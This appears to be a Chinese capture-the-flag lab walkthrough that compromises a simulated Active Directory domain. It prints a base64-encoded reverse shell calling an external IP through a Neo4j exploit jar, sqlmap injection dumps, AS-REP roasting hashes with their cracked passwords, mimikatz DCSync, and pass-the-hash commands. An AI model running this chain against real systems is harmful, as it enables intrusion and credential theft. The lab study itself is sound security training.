先用fscan掃一下,得到了下面的埠
挨個嘗試,訪問7473發現是個neo4j的服務.
這個neo4j的server只出現過這一個歷史漏洞
我們在網上下載jar漏洞利用檔案,然後在本地執行.
注意:一定是要java8,同時反彈shell的時候要使用編碼防止傳輸中出現錯誤
執行命令
java -jar .\rhino_gadget.jar rmi://39.99.227.58:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R
jcC8xMjMuNTcuMjMuNDAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
成功拿到shell
檢視/home/neo4j/flag01.txt,得到flag:flag{9be1c3b3-b972-4563-81d6-1733dc709152}
上傳並配置nps代理,上傳fscan掃描內網.
還有個12沒掃出來,有點幽默,分別看看是啥
發現172.22.6.38可以進行後臺登入.
這裡的使用者名稱處存在sql注入漏洞
我們抓取http頭部去sqlmap跑一下
proxychains sqlmap -r http -D oa_db -T oa_f1Agggg -C flag02 --dump --batch
得到了第二個flag:flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}
接下來我們把oa_db資料庫下的oa_users表dump下來,一會會用到
proxychains sqlmap -r http -D oa_db -T oa_users --dump --batch
然後使用python指令碼進行處理,提取出其中的使用者名稱到user.txt中
import re
# 開啟原始資料檔案
with open('/home/lbz/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv', 'r') as file:
data = file.readlines()
# 提取指定字串
users = []
for line in data:
match = re.search(r'(\w+)@xiaorang.lab', line)
if match:
username = match.group(1)
users.append(username)
# 儲存提取後的字串到 user.txt
with open('user.txt', 'w') as file:
for user in users:
file.write(user + '\n')
AS-REPRoasting
當關閉了預身份驗證後(該屬性預設是沒關的),此時向域控制器的88埠傳送AS_REQ請求,此時域控不會進行任何驗證就將TGT和該使用者Hash加密的Login Session Key 返回,我們在本地就可以對獲取到的使用者Hash加密的Session-Key進行離線破解,從而得到域使用者的NTLM雜湊
使用命令查詢未設身份認證的使用者:
proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile /home/lbz/Documents/user.txt xiaorang.lab/
一共有兩個未設身份認證的使用者
我們得到了他們的NTLM雜湊後的密碼Session-Key
$krb5asrep$23$wenshao@XIAORANG.LAB:e131b8fa9c2585a5742a4017a8671c6a$0f1ff468e4ec6840a86fee2d13140de9d39efa5f574ff08fe3e0fb607c6fdfbdeac93f4af1e04f7e20d907cdba5631abbb5b472ec8675810f2acb511d0d1fd2961219574b37278322ecd482c3a8d766dae4b01aa0ba298735c3ef2ca9e925012d4a774b8e0bf9709d485e50b9ad0111e4cf2b9e1f0ad8ac7cf6e9e5dac08fe1a0099db2e1faacce170e387045ef23974b9b9a71b5331981434af341b08ea768edaf133c2f9cb0496315141b1d4d305ab1de41a7f88dc8b1c4248630b0bcdfaf4f84eec565a6459f144835304ff7077ce832ee75452e1317533f118cff1b3429ed937c78730d7112c642a5254
$krb5asrep$23$zhangxin@XIAORANG.LAB:d60971c8f8c04a191b2a1841711b8515$2b134b2542f2bd8d8111cfee6f3d0d41c905fb0e298d6e9208f6518609c2d6196003a70cf294fa490492d09f41299733de088b4c125a6a0e2ee135c2e5738b5a036bb66344822337c2a9c5c574667aca451a22af7f457b5fab3e5c1202d48aa66b67eb88ae61cbe0e59387a5dd694bec8432b3ff8cb5bf5ed898145b6239808504945b3a760dcf9fd2e25a8c0303a445019679e79c5868b8a4a57b4f165c46138188c9bde537aa2e1ef47ee079f1afbbeb68857f4cf70d8980b99978f8b5495b3941534ae77b9e1841f3552bf6cdc10736949ce557ec010091be7313625be687dc124a1b21c88102a9615afa
使用hashcat去爆破一下
hashcat -m 18200 --force -a 0 '雜湊' /usr/share/wordlists/rockyou.txt
得到了賬號和密碼分別為
zhangxin@xiaorang.lab/strawberry
wenshao@xiaorang.lab/hellokitty
使用windows下mstsc登入172.22.6.25
檢視資訊時發現還有一個主機進行了本地登入
懷疑這個yuxuan是windows自動登入,透過登錄檔進行檢視
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
發現果然存在著自動登入
賬號:yuxuan@xiaorang.lab,密碼:Yuxuan7QbrgZ3L
我們切換到yuxuan賬戶.
把Sharphound複製貼上進去,進行域資訊蒐集.
bloodhound是最知名的域內資訊蒐集工具之一,它可以使用視覺化圖形顯示域環境中的關係,讓攻擊者識別高度複雜的攻擊路徑。
執行命令
SharpHound.exe -c all
然後將得到的zip上傳到Bloodhound中進行分析(然而在上傳這一步卡死了...到晚上都沒成功...,下面是網圖)
我們可以看到我們從win2019到了yuxuan,透過HasSssion,也就是儲存的登入憑證.
當前的yuxuan使用者HasSidHistory,濫用了SID歷史功能
什麼是SID歷史功能?
在域遷移或合併過程中,使用者賬戶可能會從一個域遷移到另一個域。為了確保使用者在新域中仍然能夠訪問舊域中的資源,Active Directory 提供了 SID 歷史屬性。SID 歷史屬性允許將舊域的 SID 新增到新域的使用者賬戶中,從而保留對舊域資源的訪問許可權。
如果將管理員的 SID 新增到普通使用者的歷史中,將允許低許可權賬戶執行高許可權操作。
上傳mimikatz進行域使用者抓取
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
拿到了大量使用者的雜湊
其中Administractor的雜湊為04d93ffd6f5f6e4490e0de23f240a5e9
接下來打一手雜湊橫傳.
分別在win2019(172.22.6.25)和DC(172.22.6.12)上得到了flag3和flag4
proxychains crackmapexec smb 172.22.6.12 -u Administrator -H 04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
flag3:flag{5549f5c0-fcb1-4491-b0a4-0084f103c83e}
flag4:flag{815a3b3f-8b99-4ce5-9253-ac0b31e36cb7}
共用時2小時24分鐘,目前最順利的一個靶場.學習了AS-REP Roasting攻擊.感覺理論知識很欠缺,尤其Kerberous驗證這裡.之前在tsclient靶場mstsc.exe失效了,然而這裡卻好使了,很神奇...
